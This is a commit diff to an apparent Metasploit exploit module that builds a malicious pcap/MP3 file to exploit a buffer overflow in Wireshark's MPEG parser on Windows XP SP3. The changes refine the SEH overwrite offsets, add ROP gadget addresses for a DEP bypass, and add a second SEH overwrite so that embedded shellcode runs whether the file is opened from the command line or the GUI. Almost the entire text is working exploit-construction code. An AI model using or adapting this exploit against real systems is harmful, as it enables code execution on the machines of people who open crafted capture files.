It's solved the crash when double-click on the pcap file

jholgui · jholgui · commit e25ca6464161 · 2014-04-21T17:49:40.000+01:00
diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb
@@ -47,7 +47,8 @@ def initialize(info = {})
         [
           [ 'WinXP SP3 Spanish (bypass DEP)',
             {
-              'OffSet' => 70692,
+              'OffSet' => 69732,
+              'OffSet2' => 70476,
               'Ret'    => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 
               'jmpesp' => 0x68e2bfb9,
             }
@@ -94,18 +95,30 @@ def create_rop_chain()
   def exploit
 
     print_status("Creating '#{datastore['FILENAME']}' file ...")
-    magic_header = "\xff\xfb\x41"                # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
-    packet = rand_text_alpha(891)
+
     ropchain = create_rop_chain
+    magic_header = "\xff\xfb\x41"                # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
+    # Here we build the packet data
+    packet = rand_text_alpha(883)
+    packet << "\x6c\x7d\x37\x6c" # NOP RETN
+    packet << "\x6c\x7d\x37\x6c" # NOP RETN
     packet << ropchain
-    packet << payload.encoded      							# Shellcode
+    packet << payload.encoded                                                           # Shellcode
     packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
-    # SEH pointers overwrite (nseh & seh) 
-    packet << make_nops(4) # nseh
-    # \0xff is a badchar then we can't make a jump back with jmp $-2000
+
+    # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
     # After nseh and seh we haven't space, then we have to jump to another location.
-    # 0x6b805955 :  # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [libjpeg-8.dll] **   |   {PAGE_EXECUTE_REA
-    packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN 
+
+    # When file is open with command line. This is NSEH/SEH overwrite
+    packet << make_nops(4) # nseh
+    packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN
+
+    packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk
+
+    # When file is open with GUI interface. This is NSEH/SEH overwrite
+    packet << make_nops(4) # nseh
+    packet << "\x55\x59\x80\x6b" # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [libjpeg-8.dll] **
+
     print_status("Preparing payload")
     filecontent = magic_header
     filecontent << packet
